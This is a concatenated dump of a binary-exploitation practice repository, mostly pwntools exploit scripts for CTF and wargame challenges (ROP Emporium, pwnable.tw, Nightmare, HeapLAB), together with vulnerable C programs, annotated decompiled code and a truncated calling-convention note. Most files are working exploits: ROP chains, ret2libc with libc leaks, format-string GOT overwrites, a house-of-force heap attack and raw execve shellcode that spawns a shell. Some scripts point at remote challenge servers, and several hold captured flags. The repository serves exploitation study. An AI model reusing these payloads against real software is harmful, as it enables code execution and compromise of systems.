/ROPemporium/WRITE/x64/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | binf = ELF("write4") 3 | libc = "libwrite4.so" 4 | #p = remote("chall.ctf.bamboofox.tw", 10102) 5 | p=process('write4') 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | 11 | def start(): 12 | if args.GDB: 13 | return gdb.debug(binf.path, gdbscript=gs) 14 | else: 15 | return process(binf.path) 16 | 17 | 18 | context.log_level = "DEBUG" 19 | #context.aslr = False 20 | print(binf.plt) 21 | 22 | GADGET_MOV = p64(0x400628) # mov qword ptr [r14], r15; ret; 23 | GADGET_POP = p64(0x400690) # pop r14; pop r15; ret; 24 | GADGET_POP_RDI= p64(0x400693) 25 | SECTION_DATA = p64(0x601028) 26 | PRINT_FLAG = p64(0x400620) 27 | 28 | BINSH_STRING= b'flag.txt' 29 | 30 | 31 | WRITE= GADGET_POP+SECTION_DATA+BINSH_STRING+GADGET_MOV 32 | 33 | PAD=b'A'*40 34 | 35 | p=start() 36 | 37 | p.sendafter("> ", PAD+WRITE+GADGET_POP_RDI+SECTION_DATA+PRINT_FLAG) 38 | 39 | 40 | p.interactive() 41 | -------------------------------------------------------------------------------- /ROPemporium/CALLME/x64/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | binf = ELF("callme") 3 | libc = "libcallme.so" 4 | #p = remote("chall.ctf.bamboofox.tw", 10102) 5 | p=process('callme') 6 | 7 | gs = ''' 8 | break *(&callme_one+30) 9 | ''' 10 | 11 | def start(): 12 | if args.GDB: 13 | return gdb.debug(binf.path, gdbscript=gs) 14 | else: 15 | return process(binf.path) 16 | 17 | 18 | context.log_level = "DEBUG" 19 | #context.aslr = False 20 | print(binf.plt) 21 | 22 | p=start() 23 | #pause() 24 | callme_one=p64(0x400720) 25 | callme_two=p64(0x400740) 26 | callme_three=p64(0x4006f0) 27 | gadget=p64(0x40093c) #pop rdi rsi rdx ret 28 | param1=p64(0xdeadbeefdeadbeef) 29 | param2=p64(0xcafebabecafebabe) 30 | param3=p64(0xd00df00dd00df00d) 31 | padd=b'A'*40 32 | params=gadget+param1+param2+param3 33 | 34 | 35 | p.sendafter("> ", padd+params+callme_one+params+callme_two+params+callme_three) 36 | 37 | 38 | p.interactive() 39 | #b'ROPE{a_placeholder_32byte_flag!}\n' 40 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/utc19_shellme/idLibc.py: -------------------------------------------------------------------------------- 1 | import TheNight 2 | from pwn import * 3 | 4 | 5 | target = remote("chal.utc-ctf.club", 4902) 6 | #target = process("./server") 7 | elf = ELF('server') 8 | 9 | #gdb.attach(target, gdbscript = 'b *0x804863f') 10 | 11 | payload = "" 12 | payload += "0"*0x3c 13 | payload += p32(elf.symbols["puts"]) 14 | payload += p32(elf.symbols["puts"]) 15 | payload += p32(elf.got["puts"]) 16 | payload += p32(elf.got["gets"]) 17 | 18 | target.sendline(payload) 19 | 20 | 21 | for i in range(0, 2): 22 | print target.recvuntil("Return address:") 23 | 24 | 25 | for i in range(0, 2): 26 | print target.recvline() 27 | 28 | 29 | leak0 = target.recvline()[0:4] 30 | leak1 = target.recvline()[0:4] 31 | 32 | puts = u32(leak0) 33 | gets = u32(leak1) 34 | 35 | print "puts address: " + hex(puts) 36 | print "gets address: " + hex(gets) 37 | 38 | TheNight.findLibcVersion("puts", puts, "gets", gets) 39 | 40 | target.interactive() 41 | -------------------------------------------------------------------------------- /ROP/ROPX64/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = ELF('./level2') 4 | plt_write = elf.symbols['write'] 5 | plt_read = elf.symbols['read'] 6 | vulfun_addr = 0x08048474 7 | 8 | def leak(address): 9 | payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(address) + p32(4) 10 | p.send(payload1) 11 | data = p.recv(4) 12 | print "%#x => %s" % (address, (data or '').encode('hex')) 13 | return data 14 | 15 | 16 | p = process('./level2') 17 | #p = remote('127.0.0.1', 10002) 18 | 19 | d = DynELF(leak, elf=ELF('./level2')) 20 | 21 | system_addr = d.lookup('system', 'libc') 22 | print "system_addr=" + hex(system_addr) 23 | 24 | bss_addr = 0x0804a020 25 | pppr = 0x804855d 26 | 27 | payload2 = 'a'*140 + p32(plt_read) + p32(pppr) + p32(0) + p32(bss_addr) + p32(8) 28 | payload2 += p32(system_addr) + p32(vulfun_addr) + p32(bss_addr) 29 | #ss = raw_input() 30 | 31 | print "\n###sending payload2 ...###" 32 | p.send(payload2) 33 | p.send("/bin/sh\0") 34 | 35 | p.interactive() -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/picoctf18/buffer_of1/vuln.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "asm.h" 7 | 8 | #define BUFSIZE 32 9 | #define FLAGSIZE 64 10 | 11 | void win() { 12 | char buf[FLAGSIZE]; 13 | FILE *f = fopen("flag.txt","r"); 14 | if (f == NULL) { 15 | printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n"); 16 | exit(0); 17 | } 18 | 19 | fgets(buf,FLAGSIZE,f); 20 | printf(buf); 21 | } 22 | 23 | void vuln(){ 24 | char buf[BUFSIZE]; 25 | gets(buf); 26 | 27 | printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address()); 28 | } 29 | 30 | int main(int argc, char **argv){ 31 | 32 | setvbuf(stdout, NULL, _IONBF, 0); 33 | 34 | gid_t gid = getegid(); 35 | setresgid(gid, gid, gid); 36 | 37 | puts("Please enter your string: "); 38 | vuln(); 39 | return 0; 40 | } 41 | 42 | -------------------------------------------------------------------------------- /PWNable.tw/CALC/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | context_log='debug' 5 | #p=remote('chall.pwnable.tw',10100) 6 | p = process('./calc') 7 | 8 | keys=[0x0805c34b,0xb,0x080701d1,0,0,0x08049a21,u32('/bin'),u32('/sh\0')] 9 | 10 | def leak_binsh_addr(): 11 | p.recv(1024) 12 | p.sendline('+'+str(360)) 13 | ebp_addr = int(p.recv()) 14 | rsp_addr =((ebp_addr+0x100000000)&0xFFFFFFF0)-16 15 | binsh_addr = rsp_addr+20-0x100000000 16 | return binsh_addr 17 | 18 | keys[4] = leak_binsh_addr() 19 | 20 | def write_stack(addr,content): 21 | p.sendline('+'+str(addr)) 22 | recv = int(p.recv()) 23 | if content < recv: 24 | recv = recv - content 25 | p.sendline('+'+str(addr)+'-'+str(recv)) 26 | 27 | else: 28 | recv = content-recv 29 | p.sendline('+'+str(addr)+'+'+str(recv)) 30 | 31 | p.recv() 32 | 33 | 34 | for i in range(8): 35 | write_stack(361+i,keys[i]) 36 | 37 | p.sendline('bye\n') 38 | p.interactive() 39 | -------------------------------------------------------------------------------- /ROP/ROPX64/MEMLEAK_DYNELF/x86xD/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = ELF('./level4') 4 | plt_write = elf.symbols['write'] 5 | plt_read = elf.symbols['read'] 6 | vulfun_addr = 0x8049172 7 | 8 | def leak(address): 9 | payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(address) + p32(4) 10 | p.send(payload1) 11 | data = p.recv(4) 12 | print "%#x => %s" % (address, (data or '').encode('hex')) 13 | return data 14 | 15 | 16 | p = process('./level4') 17 | #p = remote('127.0.0.1', 10002) 18 | 19 | d = DynELF(leak, elf=ELF('./level4')) 20 | 21 | system_addr = d.lookup('system', 'libc') 22 | print "system_addr=" + hex(system_addr) 23 | 24 | bss_addr = 0x0804c020 25 | pppr = 0x08049241 26 | 27 | payload2 = 'a'*140 + p32(plt_read) + p32(pppr) + p32(0) + p32(bss_addr) + p32(8) 28 | payload2 += p32(system_addr) + p32(vulfun_addr) + p32(bss_addr) 29 | #ss = raw_input() 30 | 31 | print "\n###sending payload2 ...###" 32 | p.send(payload2) 33 | p.send("/bin/sh\0") 34 | 35 | p.interactive() 36 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tamu19_pwn3/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | target = process('./pwn3') 4 | 5 | # Print out the text, up to the address of the start of our input 6 | print target.recvuntil("journey ") 7 | 8 | # Scan in the rest of the line 9 | leak = target.recvline() 10 | 11 | # Strip away the characters not part of our address 12 | shellcodeAdr = int(leak.strip("!\n"), 16) 13 | 14 | # Make the payload 15 | payload = "" 16 | # Our shellcode from: http://shell-storm.org/shellcode/files/shellcode-827.php 17 | payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 18 | # Pad the rest of the space to the return address with zeroes 19 | payload += "0"*(0x12e - len(payload)) 20 | # Overwrite the return address with the leaked address which points to the start of our shellcode 21 | payload += p32(shellcodeAdr) 22 | 23 | # Send the payload 24 | target.sendline(payload) 25 | 26 | # Drop to an interactive shell to use our newly popped shell 27 | target.interactive() -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/picoctf18/buffer_oc_0/vuln.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define FLAGSIZE_MAX 64 7 | 8 | char flag[FLAGSIZE_MAX]; 9 | 10 | void sigsegv_handler(int sig) { 11 | fprintf(stderr, "%s\n", flag); 12 | fflush(stderr); 13 | exit(1); 14 | } 15 | 16 | void vuln(char *input){ 17 | char buf[16]; 18 | strcpy(buf, input); 19 | } 20 | 21 | int main(int argc, char **argv){ 22 | 23 | FILE *f = fopen("flag.txt","r"); 24 | if (f == NULL) { 25 | printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n"); 26 | exit(0); 27 | } 28 | fgets(flag,FLAGSIZE_MAX,f); 29 | signal(SIGSEGV, sigsegv_handler); 30 | 31 | gid_t gid = getegid(); 32 | setresgid(gid, gid, gid); 33 | 34 | if (argc > 1) { 35 | vuln(argv[1]); 36 | printf("Thanks! Received: %s", argv[1]); 37 | } 38 | else 39 | printf("This program takes 1 argument.\n"); 40 | return 0; 41 | } 42 | -------------------------------------------------------------------------------- /shellcodeHandbook/INTDIVERSION/serial.c: -------------------------------------------------------------------------------- 1 | // serial.c 2 | #include 3 | #include 4 | #include 5 | int valid_serial( char *psz ) 6 | { 7 | size_t len = strlen( psz ); 8 | unsigned total = 0; 9 | size_t i; 10 | if( len < 10 ) 11 | return 0; 12 | for( i = 0; i < len; i++ ) 13 | { 14 | if(( psz[i] < '0' ) || ( psz[i] > 'z' )) 15 | return 0; 16 | total += psz[i]; 17 | } 18 | if( total % 853 == 83 ) 19 | return 1; 20 | return 0; 21 | } 22 | int validate_serial() 23 | { 24 | char serial[ 24 ]; 25 | fscanf( stdin, "%s", serial ); 26 | if( valid_serial( serial )) 27 | return 1; 28 | else 29 | return 0; 30 | } 31 | int do_valid_stuff() 32 | { 33 | printf("The serial number is valid!\n"); 34 | // do serial-restricted, valid stuff here. 35 | exit( 0 ); 36 | } 37 | int do_invalid_stuff() 38 | { 39 | printf("Invalid serial number!\nExiting\n"); 40 | exit( 1 ); 41 | } 42 | int main( int argc, char *argv[] ) 43 | { 44 | if( validate_serial() ) 45 | do_valid_stuff(); // 0x0804863c 46 | else 47 | do_invalid_stuff(); 48 | return 0; 49 | } 50 | -------------------------------------------------------------------------------- /ROP/64LinuxROP/expNX: -------------------------------------------------------------------------------- 1 | #/usr/lib/x86_64-linux-gnu/libc.so.6 2 | 3 | GADGET = 0x26542 # POP RDI 4 | SYSTEM = 0x052fd0 5 | 6 | LIBC_START = 0x7ffff7dc6000 7 | ESP_RET = 0x7fffffffe4c0 8 | 9 | SYSTEM_FUNCTION = LIBC_START + SYSTEM 10 | ROP = LIBC_START + GADGET 11 | 12 | (echo -n /bin/sh | xxd -p; printf %0130d 0; 13 | printf %016x $((0x7ffff7dc6000+0x26542)) | tac -rs..; 14 | printf %016x 0x7fffffffe4c0 | tac -rs..; 15 | printf %016x $((0x7ffff7dc6000+0x52fd0)) | tac -rs..) | xxd -r -p | 16 | setarch `arch` -R ./victimFSPNX 17 | 18 | (echo -n /bin/sh | xxd -p; printf %0130d 0; 19 | printf %016x $((0x7ffff7dc6000+0x026542)) | tac -rs..; 20 | printf %016x 0x07fffffffe4c0 | tac -rs..; 21 | printf %016x $((0x07ffff7dc6000+0x052fd0)) | tac -rs..) | 22 | xxd -r -p | setarch `arch` -R ./victimFSPNX 23 | 24 | 25 | python -c "import struct;bin='/bin/sh\0'GADGET=0x26542;SYSTEM=0x052fd0;LIBC_START=0x052fd0;ESP_RET=0x7fffffffe4c0;ROP=LIBC_START+GADGET;PAD='A'*130;print(bin+PAD+ROP+ESP_RET;SYSTEM);" 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/malloc_testbed/change_glibc_version.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import os 3 | 4 | # Grab available GLIBC versions. 5 | available_versions = [] 6 | for item in os.scandir("../.glibc"): 7 | if item.is_dir(): 8 | available_versions.append(item) 9 | available_versions.sort(key=lambda x:x.name) 10 | 11 | # Print menu. 12 | print("\n--------------------") 13 | print("Select GLIBC version") 14 | print("--------------------") 15 | for c, version in enumerate(available_versions): 16 | print(f"{c:02}) " + version.name) 17 | 18 | # Process input. 19 | choice = int(input("> ")) 20 | if choice < len(available_versions): 21 | # Remove old symlinks. 22 | try: 23 | os.unlink(".links/libc.so.6") 24 | os.unlink(".links/ld.so.2") 25 | except FileNotFoundError: 26 | print("No old links to remove") 27 | 28 | # Replace symlinks. 29 | os.symlink("../" + available_versions[choice].path + "/libc.so.6", ".links/libc.so.6") 30 | os.symlink("../" + available_versions[choice].path + "/ld.so.2", ".links/ld.so.2") 31 | -------------------------------------------------------------------------------- /PWNable.tw/CALC/read.c: -------------------------------------------------------------------------------- 1 | 2 | ssize_t read(int __fd,void *__buf,size_t __nbytes) 3 | 4 | { 5 | uint aPointer; 6 | int in_GS_OFFSET; 7 | 8 | if (*(int *)(in_GS_OFFSET + 0xc) == 0) { // if my pointed int + 12 == 0 9 | aPointer = (*(code *)_dl_sysinfo)(); // aPOinter = dl_sysinfo() and returned as code 10 | if (aPointer < 0xfffff001) { // aPointer is less that 0xfffff001? 11 | return aPointer; // ok, return the pointer 12 | } 13 | } 14 | else { // no? ... 15 | __libc_enable_asynccancel(); 16 | aPointer = (*(code *)_dl_sysinfo)(); // okey, one more time 17 | __libc_disable_asynccancel(); 18 | if (aPointer < 0xfffff001) { // now, is less? 19 | return aPointer; // okey, return it 20 | } 21 | } 22 | *(int *)(in_GS_OFFSET + -0x18) = -aPointer; // error 23 | return -1; // error 24 | } 25 | -------------------------------------------------------------------------------- /common/formatFullASLR: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import sys 3 | 4 | LOCAL=True 5 | 6 | HOST ="" 7 | PORT ="" 8 | 9 | #DIRECCIONES 10 | 11 | 12 | 13 | def exploit(r): 14 | 15 | #find correct format string parameter 16 | context.log_level="error" 17 | 18 | """ 19 | for i in range(1,256): 20 | r=process(["./console","log"]) 21 | 22 | payload = "exit " 23 | payload += "%%%d$p" % i 24 | payload += "AAAABBBB" 25 | 26 | r.sendline(payload) 27 | r.recvline() 28 | 29 | data= r.recv(100) 30 | 31 | print("d => %s" % (i,data)) 32 | 33 | r.close() 34 | 35 | """ 36 | ### correct alignament 37 | 38 | payload = "exit " 39 | payload =+ "%7$p".rjust(100) 40 | payload+="AAAABBBB" 41 | r.sendline(payload) 42 | 43 | data= r.recvline() 44 | 45 | print data 46 | r.interactive() 47 | return 48 | 49 | if name == "__main__": 50 | 51 | if len(sys.argv) >1: 52 | r=remote(HOST,PORT) 53 | exploit(r) 54 | else: 55 | r=process(["./console","log"]) 56 | print util.proc.pidof(r) 57 | pause() 58 | exploit(r) -------------------------------------------------------------------------------- /PWNable/passcode/passcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void login(){ 5 | int passcode1; 6 | int passcode2; 7 | 8 | printf("enter passcode1 : "); 9 | scanf("%d", passcode1); 10 | fflush(stdin); 11 | 12 | // ha! mommy told me that 32bit is vulnerable to bruteforcing :) 13 | printf("enter passcode2 : "); 14 | scanf("%d", passcode2); 15 | 16 | printf("checking...\n"); 17 | if(passcode1==338150 && passcode2==13371337){ 18 | printf("Login OK!\n"); 19 | system("/bin/cat flag"); 20 | } 21 | else{ 22 | printf("Login Failed!\n"); 23 | exit(0); 24 | } 25 | } 26 | 27 | void welcome(){ 28 | char name[100]; 29 | printf("enter you name : "); 30 | scanf("%100s", name); 31 | printf("Welcome %s!\n", name); 32 | } 33 | 34 | int main(){ 35 | printf("Toddler's Secure Login System 1.0 beta.\n"); 36 | 37 | welcome(); 38 | login(); 39 | 40 | // something after login... 41 | printf("Now I can safely trust you that you have credential :)\n"); 42 | return 0; 43 | } 44 | 45 | -------------------------------------------------------------------------------- /ADWorld/STACK2/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from ctypes import * 3 | import time 4 | # p=remote('220.249.52.133','58641') 5 | p=process('stack2') 6 | # libc = cdll.LoadLibrary("libc.so.6") 7 | # print(p.recvuntil("How many numbers you have:")) 8 | print(p.recvuntil("*(0 <= x < 256)")) 9 | print(p.recvuntil("***********************************************************")) 10 | print(p.recvline()) 11 | print(p.recvline()) 12 | p.sendline("99") 13 | print(p.recvline()) 14 | for i in range(99): 15 | p.sendline("1") 16 | # time.sleep(.3) 17 | # time.sleep(.3) 18 | # print(p.recv()) 19 | print(p.recv()) 20 | p.sendline("1") 21 | print(p.recvuntil("5. exit")) 22 | # p.sendline("2") 23 | # print(p.recvline()) 24 | # p.sendafter('Give me your numbers\n',p64(1)) 25 | 26 | # payload=0x40*"a"+p64(0) 27 | # p.sendline(payload) 28 | 29 | # a=[] 30 | # for i in range(50): 31 | # a.append(libc.rand(0)) 32 | # print(a) 33 | # for i in a: 34 | # p.recv() 35 | # print(p.recv()) 36 | # p.sendline(str(i)) 37 | p.interactive() 38 | #cyberpeace{e6fa49618a3baa7d0eaf194dc9494dc9} 39 | -------------------------------------------------------------------------------- /ROP/64LinuxROP/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | bin='/bin/sh\0 ' 3 | GADGET=0x26542 4 | SYSTEM=0x052fd0 5 | LIBC_START=0x7ffff7dc6000 6 | ESP_RET=0x7fffffffe550 7 | ROP=LIBC_START+GADGET #0x7ffff7dec542 8 | PAD='A'*(64 - len(bin)) 9 | exploit=bin+PAD+struct.pack('< Q',ROP)+struct.pack('< Q',ESP_RET)+struct.pack('< Q',SYSTEM+LIBC_START)+('A'*10) 10 | #print(len(exploit)) 11 | print(exploit) 12 | 13 | 14 | 15 | #SYSTEM 0x7ffff7e18fd0 16 | #python -c "import struct;bin='/bin/sh\0';GADGET=0x26542;SYSTEM=0x052fd0;LIBC_START=0x7ffff7dc6000;ESP_RET=0x7fffffffe550;ROP=LIBC_START+GADGET; 17 | #PAD='A'*(72 - len(bin));print(bin+PAD+struct.pack('< Q',ROP)+struct.pack('< Q',ESP_RET)+struct.pack('< Q',SYSTEM+LIBC_START))" 18 | 19 | 20 | #f it doesn't work, it will continue to increase. If it is changed 16 times, it will definitely encounter stack alignment.f it doesn't work, it will continue to increase. If it is changed 16 times, it will definitely encounter stack alignment.f it doesn't work, it will continue to increase. If it is changed 16 times, it will definitely encounter stack alignment. -------------------------------------------------------------------------------- /common/exploitFMTS.py: -------------------------------------------------------------------------------- 1 | from formatStringExploiter.FormatString import FormatString 2 | from pwn import * 3 | 4 | winner = 0x4008DA 5 | 6 | #payload = 'AAAA.1.%1$#x.2.%2$#x.3.%3$#x.4.%4$#x.5.%5$#x.6.%6$#x.7.%7$#x.8.%8$#x.' 7 | 8 | 9 | # p=remote("220.249.52.133","42898") 10 | p=process("./marty",buffer_fill_size=0xffff) 11 | elf=ELF("./marty") 12 | def exec_fmt(s): 13 | p.sendlineafter("Exit the battle","2") 14 | sleep(0.1) 15 | p.sendline(s) 16 | ret = p.recvuntil("1. Stack Bufferoverflow Bug",drop=True) 17 | p.recvuntil("3. Exit the battle") 18 | # p.close() 19 | print(s) 20 | return ret 21 | 22 | 23 | # Load the binary in pwntools. This way we don't need to worry about the 24 | # details, just pass it to FormatString 25 | 26 | # exec_fmt("aaaaaoo") 27 | payload=fsmtStr = FormatString(exec_fmt,elf=elf,index=6,pad=0,explore_stack=False) 28 | # fsmtStr.write_q(elf.symbols['got.printf'], str(winner)) 29 | print(payload.write_q(elf.symbols['got.printf'], winner)) 30 | p.sendline("2") 31 | p.interactive() 32 | # cyberpeace{5edf2b804cb625b46ed72702d16b006f} 33 | -------------------------------------------------------------------------------- /ADWorld/mary/exploitFMTS.py: -------------------------------------------------------------------------------- 1 | from formatStringExploiter.FormatString import FormatString 2 | from pwn import * 3 | 4 | winner = 0x4008DA 5 | 6 | #payload = 'AAAA.1.%1$#x.2.%2$#x.3.%3$#x.4.%4$#x.5.%5$#x.6.%6$#x.7.%7$#x.8.%8$#x.' 7 | 8 | 9 | # p=remote("220.249.52.133","42898") 10 | p=process("./marty",buffer_fill_size=0xffff) 11 | elf=ELF("./marty") 12 | def exec_fmt(s): 13 | p.sendlineafter("Exit the battle","2") 14 | sleep(0.1) 15 | p.sendline(s) 16 | ret = p.recvuntil("1. Stack Bufferoverflow Bug",drop=True) 17 | p.recvuntil("3. Exit the battle") 18 | # p.close() 19 | print(s) 20 | return ret 21 | 22 | 23 | # Load the binary in pwntools. This way we don't need to worry about the 24 | # details, just pass it to FormatString 25 | 26 | # exec_fmt("aaaaaoo") 27 | payload=fsmtStr = FormatString(exec_fmt,elf=elf,index=6,pad=0,explore_stack=False) 28 | # fsmtStr.write_q(elf.symbols['got.printf'], str(winner)) 29 | print(payload.write_q(elf.symbols['got.printf'], winner)) 30 | p.sendline("2") 31 | p.interactive() 32 | # cyberpeace{5edf2b804cb625b46ed72702d16b006f} 33 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/house_of_force/exploit-write.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | context.log_level = "DEBUG" 4 | elf = context.binary = ELF("house_of_force") 5 | libc = ELF(elf.runpath + b"/libc.so.6") # elf.libc broke again 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Select the "malloc" option, send size & data. 17 | def malloc(size, data): 18 | io.send(b"1") 19 | io.sendafter(b"size: ", f"{size}".encode()) 20 | io.sendafter(b"data: ", data) 21 | io.recvuntil(b"> ") 22 | 23 | 24 | io = start() 25 | io.recvuntil('puts() @ ') 26 | puts=int(io.recvline(),16) 27 | info(f"PUTS -> {hex(puts)}") 28 | io.recvuntil('heap @ ') 29 | heap=int(io.recvline(),16) 30 | info(f"HEAP -> {hex(heap)}") 31 | d=((0xffffffffffffffff-heap)+elf.symbols.target-0x40) 32 | info(f"DELTA -> {d}") 33 | # d=24 34 | malloc('24',b'A'*24+p64(0xffffffffffffffff)) 35 | malloc(d,b'J') 36 | malloc(24,b'Pauned :D') 37 | io.send('2') 38 | io.interactive() 39 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/utc19_shellme/exploit.py: -------------------------------------------------------------------------------- 1 | import TheNight 2 | from pwn import * 3 | 4 | 5 | target = remote("chal.utc-ctf.club", 4902) 6 | libc = ELF("libc6_2.27-3ubuntu1_i386.so") 7 | 8 | #target = process("./server") 9 | elf = ELF('server') 10 | 11 | 12 | payload = "" 13 | payload += "0"*0x3c 14 | payload += p32(elf.symbols["puts"]) 15 | payload += p32(elf.symbols["vuln"]) 16 | payload += p32(elf.got["puts"]) 17 | 18 | target.sendline(payload) 19 | 20 | 21 | for i in range(0, 2): 22 | print target.recvuntil("Return address:") 23 | 24 | 25 | for i in range(0, 2): 26 | print target.recvline() 27 | 28 | 29 | leak0 = target.recvline()[0:4] 30 | 31 | puts = u32(leak0) 32 | 33 | libcBase = puts - libc.symbols["puts"] 34 | 35 | print "libc base: " + hex(libcBase) 36 | 37 | binshOffset = 0x17e0cf 38 | 39 | payload1 = "" 40 | payload1 += "0"*0x3c 41 | payload1 += p32(libcBase + libc.symbols["system"]) 42 | payload1 += p32(0x30303030) 43 | payload1 += p32(libcBase + binshOffset) 44 | 45 | target.sendline(payload1) 46 | 47 | target.interactive() 48 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/house_of_force/exploit-shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | context.log_level = "DEBUG" 4 | elf = context.binary = ELF("house_of_force") 5 | libc =elf.libc # elf.libc broke again 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Select the "malloc" option, send size & data. 17 | def malloc(size, data): 18 | io.send(b"1") 19 | io.sendafter(b"size: ", f"{size}".encode()) 20 | io.sendafter(b"data: ", data) 21 | io.recvuntil(b"> ") 22 | 23 | io = start() 24 | io.recvuntil('puts() @ ') 25 | puts=int(io.recvline(),16) 26 | info(f"PUTS -> {hex(puts)}") 27 | libc.address=puts-libc.sym.puts 28 | io.recvuntil('heap @ ') 29 | heap=int(io.recvline(),16) 30 | info(f"HEAP -> {hex(heap)}") 31 | malloc(24, b"A"*24 + p64(0xffffffffffffffff)) 32 | d=libc.sym.__malloc_hook - heap - 0x40 33 | malloc(d, b"/bin/sh\0") 34 | malloc(24, p64(libc.sym.system)) 35 | cmd=heap+0x30 36 | data=b"" 37 | io.send(b"1") 38 | io.sendafter(b"size: ", f"{cmd}".encode()) 39 | io.interactive() -------------------------------------------------------------------------------- /HEAP/syscallMalloc/mmap.c: -------------------------------------------------------------------------------- 1 | /*private anonymous mapping example using mmap syscall*/ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | void static inline errExit(const char* msg) 12 | { 13 | printf("%s failed. Exiting the process\n", msg); 14 | exit(-1); 15 | } 16 | 17 | 18 | int main() 19 | { 20 | int ret = -1; 21 | printf("Welcome to private anonymous mapping example::PID:%d\n", getpid()); 22 | printf("Before mmap\n"); 23 | getchar(); 24 | char* addr = NULL; 25 | addr = mmap(NULL, (size_t)132*1024, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 26 | if (addr == MAP_FAILED) 27 | errExit("mmap"); 28 | printf("After mmap\n"); 29 | getchar(); 30 | 31 | /* Unmap mapped region. */ 32 | ret = munmap(addr, (size_t)132*1024); 33 | if(ret == -1) 34 | errExit("munmap"); 35 | printf("After munmap\n"); 36 | getchar(); 37 | return 0; 38 | } 39 | -------------------------------------------------------------------------------- /PWNable.tw/CALC/calc.c: -------------------------------------------------------------------------------- 1 | 2 | void calc(void) 3 | 4 | { 5 | int myVariable; 6 | int in_GS_OFFSET; 7 | int pool; 8 | undefined4 stack100 [100]; 9 | undefined buffer1024 [1024]; 10 | int canary; 11 | 12 | canary = *(int *)(in_GS_OFFSET + 0x14); 13 | while( true ) { 14 | bzero(buffer1024,0x400); // fill zeros in buffer1024 15 | myVariable = get_expr((int)buffer1024,0x400); // get expresion and save on myVariable 16 | if (myVariable == 0) break; // break 17 | init_pool(&pool); // init_pool with pool address 18 | myVariable = parse_expr(buffer1024,&pool); // afer get expresion, partse it 19 | if (myVariable != 0) { // only if myvar is != 0 ... 20 | printf("%d\n",stack100[pool + -1]); // printf from stack100 which appears be an stack of results 21 | fflush((FILE *)stdout); // only fflush 22 | } 23 | } 24 | if (canary == *(int *)(in_GS_OFFSET + 0x14)) { 25 | return; 26 | } 27 | /* WARNING: Subroutine does not return */ 28 | __stack_chk_fail(); 29 | } 30 | 31 | -------------------------------------------------------------------------------- /PWNable.tw/CALC/get_expr.c: -------------------------------------------------------------------------------- 1 | 2 | int get_expr(int param_1,int param_2) // (buffer1024, 1024) 3 | 4 | { 5 | ssize_t sizeExpr; 6 | char myExpresion; 7 | int contador; 8 | 9 | contador = 0; 10 | while (contador < param_2) { 11 | sizeExpr = read(0,&myExpresion,1); // read my expresion and save in myExpresion and return size in sizeExpr 12 | if ((sizeExpr == -1) || (myExpresion == '\n')) break; // if sizeExpr equals -1 oe myExpresion to '\n': break 13 | if ((((myExpresion == '+') || (((myExpresion == '-' || // if my Expresion is + or - 14 | myExpresion == '*')) || (myExpresion == '/')))) || // or * or / 15 | (myExpresion == '%')) || // or % 16 | (('/' < myExpresion && (myExpresion < ':')))) { // or an number 17 | *(char *)(contador + param_1) = myExpresion; // asign to myExpresion next char 18 | contador = contador + 1; // increment contador in 1 19 | } 20 | } //end while 21 | *(undefined *)(param_1 + contador) = 0; // set 0 to end of param1 to end 22 | return contador; 23 | } -------------------------------------------------------------------------------- /CallingConventions/CDECL: -------------------------------------------------------------------------------- 1 | CDECL 2 | In the CDECL calling convention the following holds: 3 | 4 | Arguments are passed on the stack in Right-to-Left order, and return values are passed in eax. 5 | The calling function cleans the stack. This allows CDECL functions to have variable-length argument lists (aka variadic functions). For this reason the number of arguments is not appended to the name of the function by the compiler, and the assembler and the linker are therefore unable to determine if an incorrect number of arguments is used. 6 | Wikipedia-logo-v2.svg 7 | Wikipedia has related information at Variadic_function 8 | 9 | Variadic functions usually 